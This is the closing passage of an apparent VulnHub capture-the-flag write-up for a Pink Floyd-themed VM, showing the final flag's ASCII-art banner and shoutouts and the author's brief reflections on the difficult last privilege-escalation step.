  |_____|_______|_______|_ _,--'\      _,-'_____|_______|_______|_____|
  | |       |       |     '     ||_||-' _   |       |       |       | |
  |_|_______|_______|_______|__ || ||,-'  __|_______|_______|_______|_|
  |     |       |       |       |  ||_,-'       |       |       |     |
  |_____|_______|______.|_______.__  ___|_______|_______|_______|_____|
  | |       |       |   \    |     /        |       |       |       | |
  |_|_______|_______|___ \ __|___ /,  _ |   | ______|_______|_______|_|
  |     |       |       | \      // \   |   |   |       |       |     |
  |_____|_______|_______|_ \ /\ //--'\  |   | __|_______|_______|_____|
  | |       |       |       '  V/    |  |-' |__,    |       |       | |
  |_|_______|_______|_______|_______ _______'_______|_______|_______|_|
  |     |       |       |       |       |       |       |       |     |
  |_____|_______|_______|_______|_______|_______|_______|_______|_____|
  |_________|_______|_______|_______|_______|_______|_______|_______|_|

                  Celebrating 50 years of Pink Floyd!
             Syd Barrett (RIP), Nick Mason, Roger Waters,
               Richard Wright (RIP), and David Gilmour.


** Shoutouts **
+ @vulnhub for making it all possible
+ @rastamouse @thecolonial - "the test bunnies"

-=========================================-
-  xerubus (@xerubus - www.mogozobo.com)  -
-=========================================-

Conclusion

I really enjoyed this VM - not just because I'm a big fan of Pink Floyd, but also because of how it was laid out. The final step really did my head in. I spent days obsessing over how I could elevate my privileges, without read access to the final binary.

One lesson I'm taking away from this is, always double check your evidence. You never know when the last piece of the puzzle is sitting there in plain sight.

Thanks for the challenge Xerubus, and thank you for hosting it VulnHub!